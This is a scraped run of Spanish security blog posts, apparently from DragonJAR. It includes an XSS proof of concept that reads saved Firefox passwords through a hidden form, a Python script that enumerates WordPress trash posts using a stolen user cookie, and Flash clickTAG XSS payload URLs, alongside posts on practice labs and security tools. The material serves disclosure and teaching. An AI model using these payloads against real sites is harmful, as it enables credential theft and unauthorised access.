El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo “password” y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.

Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:

El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:

<script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script>

Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.

En este caso contar con “clave maestra” en el administrador de contraseñas del Mozilla Firefox no supone una “barrera” para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.

Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.

Actualización:
Un fallo similar fue reportado en el 2006 y supuestamente fue resuelto “VERIFIED FIXED”, pero acabo de probar con la prueba de concepto que publicaron en esa ocasión y sigue siendo vulnerable.

Recomendaciones:

• Escribe “about:config” en la barra del Firefox para desactivar (poner en “false”) la función signon.autofillForms



Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.

• Utilizar el plugin NoScript (si no hay inyección de código, no hay problema)
• No utilizar el Administrador de Contraseñas de Mozilla Firefox (ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador), en vez de el utilizar servicios gratuitos como LastPass (al que por cierto le debo un articulo entero)

Mas Información:
XSS demo for stealing passwords from the Firefox password manager

También puede interesarte...

• ¿Cómo Recuperar una Cuenta de Facebook?
• Resetear Password de Root
• Como Recuperar Clave MySQL
• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Las Peores 500 Contraseñas de Todos los Tiempos
• PassPub, Generador de Contraseñas Seguras
• Maneja tus Contraseñas de Forma Sencilla

Comodo Dragon esta basado en el navegador Chromium (igual que Google Chrome), pero ademas de las características que ya incluye Chromiun el nuevo navegador seguro de Comodo incluye las siguientes:

• Privacidad de Chromium Mejorada
• Fácil identificación del certificado SSL
• Acceso a sitios web más rápido
• Mayor estabilidad y menos consumo de memoria
• Modo Incognito (también conocido como “modo porno”) detiene las Cookies, Mejora de privacidad
• Si usas Cromium o Google Chrome es Muy fácil de cambiar de su navegador a Comodo Dragón

De momento Comodo Dragon esta disponible para Windows XP/Vista/7/Server, pero funciona adecuadamente con Wine en Mac (aun no probado en GNU Linux).

Descargar Comodo Dragon, el navegador pensado en tu seguridad.

También puede interesarte...

• Descargar Gratis Internet Explorer 8 Final
• Fallo en OpenSSL permite obtener clave privada
• Descargar e Instalar Google Chrome OS
• Google Chrome para GNU Linux y Mac OS X
• Forzando Conexiones SSL por defecto
• Actualiza tu equipo con Windows
• Sin SSL ¿Y Ahora Quien Podrá Defendernos?
• Linux Unified Kernel – Soporte para GNU Linux y Windows desde el mismo Kernel

Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental.

Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”.

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}

print
print “Target = http://” + blogURL + “/?p=” + str(postID)
print

while 1:

# Start non authenticated enumeration

request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)

try:
r1 = conn.getresponse()
except:
print “Connection error”

data1 = r1.read()

# Start authenticated enumeration

conn.request(“GET”, request, None, Headers)

try:
r2 = conn.getresponse()
except:
print “Connection error”

data2 = r2.read()

# Compare the HTML body reponses

if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print request

postID += 1

conn.close()

Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad.

Una vez más queda confirmado que la seguridad por “oscuridad”  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.

PD. Lo que no entiendo es por que páginas como DaboWeb y Mangas Verdes hablan de este fallo y afirman que un posible atacante puede “Eliminar artículos de nuestro WordPress” ¿De donde habrán sacado esa informacion?…

También puede interesarte...

• Como realizar un borrado seguro usando BleachBit
• Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5
• Denegacion de Servicio en WordPress
• Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Memorias del DISI 2009
• El Atacante Informático – Capítulo 2
• Boletín de La Comunidad DragonJAR #0008

A pesar de ser una herramienta muy útil,  personalmente pienso que esta sobreutilizada y que tiene gran cantidad de defectos, como no poder ser indexados adecuadamente en los buscadores,  la cantidad de recursos que consume cuando se utiliza para visualizar película s o vídeos online,  a esta lista de desventajas, ahora hay que sumarle un nuevo fallo de seguridad, descubierto por el investigador MustLive y publicado en su sitio websecurity.com.ua.

El fallo consiste en una vulnerabilidad de XSS (Cross-site scripting) la cual permite incrustar codigo Javascript y/o HTML, en algunas animaciones flash que no validan correctamente sus parámetros de entrada.

Ejemplo del código vulnerable:

Como se puede ver,  en el siguiente código actionscript, no se hace validación alguna a las variables obtenidas:

getURL(_root.clickTAG, "_blank");

El codigo anterio podria ser explotado de la siguiente forma:

http://sitiovulnreable/flash.swf?clickTAG=javascript:alert('comunidad dragonjar')

Pero no es la única variable vulnerable a este tipo de vulnerabilidades XSS

getURL(_root.url, "_blank");

Que puede ser explotada de la siguiente forma:

http://sitiovulnreable/flash.swf?url=javascript:alert('comunidad dragonjar')

Para ver el funcionamiento de este tipo de ataques, les dejo este flash en el portal del “Area Metropolitana del Valle de Aburrá”, donde podemos ver que con solo deja correr la animacion , nos ejecutara el alert en javascript que hemos incrustado de forma arbitraria en el archivo flash, por lo que podríamos realizar todo tipo de estafas y engaños utilizando el nombre de esta pagina del gobierno colombiano.

Este problema que afecta millones de sitios en la red (lo cual podemos comprobar con una simple búsqueda en google  ”filetype:swf  inurl:clicktag”), es aun mas grave si se tiene en cuenta que la mayoría de las personas que manejan Flash y en especial su lenguaje de programación ActionScript, son diseñadores o programadores que no tienen en cuenta la seguridad a la hora de realizar sus trabajos, una muestra de esto lo podemos ver en el periódico ”El Heraldo” de Barranquilla que recomienda el uso de un código vulnerable para realizar la publicidad que se publica en su portal.

Mas Información:
XSS vulnerabilities in 8 millions flash files
Serious web vuln found in 8 million Flash files XSS

También puede interesarte...

• Multiples Vulnerabilidades en SMF
• Cursos Gratis de Diseño Web en el Sena Virtual
• XSS que permite postear a atacante registrado en WordPress
• Criterios para la Evaluación de los Escaners de Seguridad Web
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Descargar Gratis Internet Explorer 8 Final
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• Los Blogs alojados en WordPress.com Vulnerables

• WebGoat es una aplicación web J2EE deliberadamente insegura, mantenida por OWASP y diseñada para enseñar lecciones de seguridad en aplicaciones Web. puedes aprender mas sobre esta herramienta en nuestro laboratorio.

• Moth es una imagen de VMware que contiene un conjunto de aplicaciones Web y scripts vulnerables, que puedes utilizar para probar scanners de seguridad en aplicaciones Web, herramientas de análisis de código estático (SCA), dar cursos introductorios de seguridad en aplicaciones Web. puedes encontrar mas informacion sobre esta herramienta en nuestra comunidad.

• BadStore es una aplicacion web para tienda virtual, que incluye de manera intencionada diferentes fallos de seguridad informática, para probar nuestros conocimientos y herramientas sobre ella.

• WebMaven es un entorno interactivo de seguridad web, que emula varios de los mas comunes fallos en las aplicaciones web.

• SecuriBench es una aplicacion escrita en java en la universidad de Stanford, que incluye las siguientes vulnerabilidades SQL injection attacks, Cross-site scripting attacks, HTTP splitting attacks, Path traversal attacks, para practicar con ellas.

• Mutillidae es un conjunto de scripts vulnerables escritos en php, a diferencia de otras aplicaciones de su tipo, multilliadae se diferencia por la simplicidad de su código, enfocado en las personas que apenas empiezan a desarrollar aplicaciones web.

• SERIE HACME, la serie Hacme es un conjunto de aplicaciones web temáticas escritas por Foundstone, que tienen en su código de forma deliberada, multitud de vulnerabilidades web, para que practiquemos nuestros conocimientos sobre seguridad web, dentro de esta serie tenemos un aplicativo web de un casino Hacme Casino (del cual hablamos en la ezine 2 de nuestra comunidad), una aplicacion web de compras Hacme Shipping , un sistema de viajes Hacme Travel y una aplicacion web que simula ser un banco Hacme Bank.

Si conoces otra aplicacion web de este tipo que no este en la lista, déjanos un comentario para que sea agregada.

Actualizado 18/01/2010 : Agrego WebMaven , SecuriBench, y BadStore, gracias al comentario de colliers

También puede interesarte...

• Wapiti – Escaner de Vulnerabilidades en Aplicaciones Web
• HttpBee la Navaja Suiza de las Aplicaciones Web
• Pipper – Herramienta para la auditorías de aplicaciones web
• FAQ sobre Seguridad en Aplicaciones Web
• Sandcat, Escaneador de Servidores y Aplicaciones Web
• Como realizar un borrado seguro usando BleachBit
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• WAFP – Detecta la Versión de una Aplicación Web

Para reafirmar el uso de Firefox como Herramienta de Seguridad les presento FireCAT, un completo catalogo de las extensiones para Firefox, que están especialmente diseñadas para su uso en una auditoria de seguridad:

En la comunidad ya habíamos hablado del FireCAT en su versión 1.5, en esa ocasión, se había publicado el catalogo de extensiones para realizar auditorias con firefox en PDF y html, con esta nueva versión 1.6 el FireCAT pasa a estar disponible de forma online, en un mapa mas interactivo creado en flash:

Espero que les sea de utilidad y encuentren algunos buenos plugins que no conocian.

Mas Información:
Pagina Oficial del FireCAT

También puede interesarte...

• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Backtrack 4 Final
• Top 100 Herramientas de Seguridad Open Source
• WEPBuster, automatizando la auditoría de redes inalámbricas
• Dradis, organiza y comparte información en un Test de Penetración
• NetworkMiner, Herramienta forense de Análisis de Red
• Descargar Gratis Internet Explorer 8 Final
• Browser Ride – Explota tu Navegador

Constantemente salen nuevas técnicas de seguridad web, pero muchas veces estas son dejadas en el olvido en blogs y papers poco visitados/descargados, la finalidad de este top, es dar a conocer estas nuevas tecnicas, para poder tenerlas en cuenta a la hora de testear o programar una aplicación web. El TOP 10 de Tenicas en Seguridad Web del 2009 es:

1. Creating a rogue CA certificate
   Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger
2. HTTP Parameter Pollution (HPP)
   Luca Carettoni, Stefano diPaola
3. Flickr’s API Signature Forgery Vulnerability (MD5 extension attack)
   Thai Duong and Juliano Rizzo
4. Cross-domain search timing
   Chris Evans
5. Slowloris HTTP DoS
   Robert Hansen, (additional credit for earlier discovery to Adrian Ilarion Ciobanu & Ivan Ristic – “Programming Model Attacks” section of Apache Security for describing the attack, but did not produce a tool)
6. Microsoft IIS 0-Day Vulnerability Parsing Files (semi‐colon bug)
   Soroush Dalili
7. Exploiting unexploitable XSS
   Stephen Sclafani
8. Our Favorite XSS Filters and how to Attack them
   Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)
9. RFC1918 Caching Security Issues
   Robert Hansen
10. DNS Rebinding (3-part series Persistent Cookies, Scraping & Spamming, and Session Fixation)
    Robert Hansen

Cada técnica expuesta en este TOP 10, será explicada detalladamente en los eventos IT-Defense y RSA USA 2010 donde Jeremiah Grossman dictará la charla “2010: A Web Hacking Odyssey”.

Puedes ver los mas de 80 articulos propuestos para este TOP10 en este enlace, aunque no quedaron en el podio, no dejan de ser una buena fuente de información si te interesa el área de la seguridad en aplicaciones web.

También puede interesarte...

• Charla de Seguridad Web Gratuita – Barcelona España
• GNU/Linux Seguridad Técnica y Legal (PDF)
• Memorias del DISI 2009
• El Atacante Informático – Capítulo 2
• Boletín de La Comunidad DragonJAR #0008
• Pastel, Cheet Sheets, Chuletas en la Seguridad Informática
• Así fué el Technet Security Day de Microsoft en Barcelona
• ¿Cómo tomar control de un Dominio en Windows?

¿Como funciona?
WAFP obtiene los archivos HTML que genera una aplicacion web y  le saca una firma que identifica ese archivo generado con una versión especifica de la aplicacion, como estas salidas cambian en cada versión de la aplicacion, es posible detectar de forma muy precisa la versión y el numero de compilación de una aplicacion web.

Esta es la salida de la aplicacion contra una instalación de phpymadmin:

  wafp.rb --verbose -p phpmyadmin https://phpmyadmin.example.de
   VERBOSE: loading the fingerprint database to the ram...
   Collecting the files we need to fetch ...
   Fetching needed files (#432), calculating checksums and storing the results to the database:
   ............................................................................................
   VERBOSE: request for "/themes/darkblue_orange/img/b_info.png" produced "Connection refused - connect(2)" for 1 times - retrying...
   ............................................................................................
   Checking gathered/stored checksums (#432) against the selected product (phpmyadmin) versions (#87) checksums:
   .......................................................................................

    found the following matches (limited to 10):
   +-------------------------------------------------------------+
    phpmyadmin-2.11.9.1                	 296 / 299  (98.99%)
    phpmyadmin-2.11.9.2                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.4                	 295 / 299  (98.66%)
    phpmyadmin-2.11.8.1                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.5                	 295 / 299  (98.66%)
    phpmyadmin-2.11.8                  	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.3                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9                  	 295 / 299  (98.66%)
    phpmyadmin-2.11.4                  	 294 / 299  (98.33%)
    phpmyadmin-2.11.5.2                	 294 / 299  (98.33%)
   +-------------------------------------------------------------+
    WAFP 0.01-26c3  - - - - - - - - -  http://mytty.org/wafp/

   VERBOSE: Returncode stats:
   VERBOSE: Ret-Code	200	#302
   VERBOSE: Ret-Code	404	#130
   VERBOSE: deleting the temporary database entries for scan "472312620367191262036719_httpsphpmyadmin.example.de" ...

Esta herramienta cuenta con mas de 600 versiones de las aplicaciones web mas populares y esta base de datos crecerá a medida que se publiquen nuevas versiones.

Descargar WAFP

Mas Información:
Pagina Oficial de WAFP
Diapositivas de Charla en edición 26 de CCC

También puede interesarte...

• Binging – Footprinting utilizando Bing
• httprecon, Identificación Avanzada de Servidores Web
• Video: Test de Intrusióna a una Aplicacion Web
• Como realizar un borrado seguro usando BleachBit
• Como Recuperar Clave MySQL
• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Aplicaciones Web Vulnerables
• Backtrack 4 Final

El listado de vulnerabilidades detectadas es el siguiente:

• Errores en el Manejo de Archivos (Inclusión remota o local usando include/require, fopen, readfile…)
• Inyecciones en Bases de Datos (Soporta PHP/JSP/ASP e inyecciones SQL y XPath)
• XSS (Cross Site Scripting)
• Inyecciones LDAP
• Ejecución de Comandos (eval(), system(), passtru()…)
• Inyeccione CRLF  (HTTP Response Splitting, session fixation…)

Esta excelente herramienta programada en python destaca por sus detallados informes, donde podemos ver la descripción del problema encontrado, cómo resolver dicho problema y algunas paginas de referencia donde podemos ampliar nuestro conocimiento sobre el tema.

Recuerda que el uso de este tipo de herramientas, que automatizan el testeo de vulnerabilidades en tus aplicativos web, ayudan a encontrar fácilmente algunos problemas de las aplicaciones web, pero no reemplazan una auditoria concienzuda del código fuente.

Descargar Wapiti

Mas Información:
Pagina Oficial del Wapiti

También puede interesarte...

• Sandcat, Escaneador de Servidores y Aplicaciones Web
• Aplicaciones Web Vulnerables
• Multiples Vulnerabilidades en SMF
• Vulnerabilidades Web que Permiten Acceder al Sistema
• HttpBee la Navaja Suiza de las Aplicaciones Web
• Pipper – Herramienta para la auditorías de aplicaciones web
• FAQ sobre Seguridad en Aplicaciones Web
• Como realizar un borrado seguro usando BleachBit

Entre los fallos encontrados existen 3 con peligrosidad alta (uno de ellos permite ejecución remota de código), 14 con un nivel de peligro medio (en su mayoría ataques del tipo XSS) y en resto de los fallos tienen un nivel de peligrosidad bajo o nulo.

Desde la comunidad DragonJAR enviamos un saludo a los integrantes del equipo SimpleAudit no solo por los fallos encontrados, sino por la publicación responsable de ellos, esperando que SMF publicara una versión parcheada de su software para hacer el Full Disclosure.

Cada uno de los fallos encontrados en SMF han sido publicados y explicados en el foro de ElHacker.net por WHK, ademas en nuestro idioma.

Mas Información:
Pagina del Proyecto
Anuncio en el Foro
Full Disclosure

También puede interesarte...

• Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash
• Wapiti – Escaner de Vulnerabilidades en Aplicaciones Web
• XSS que permite postear a atacante registrado en WordPress
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Criterios para la Evaluación de los Escaners de Seguridad Web
• Bug en el modulo Quick Question de Joomla
• XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2
• Descargar Gratis Internet Explorer 8 Final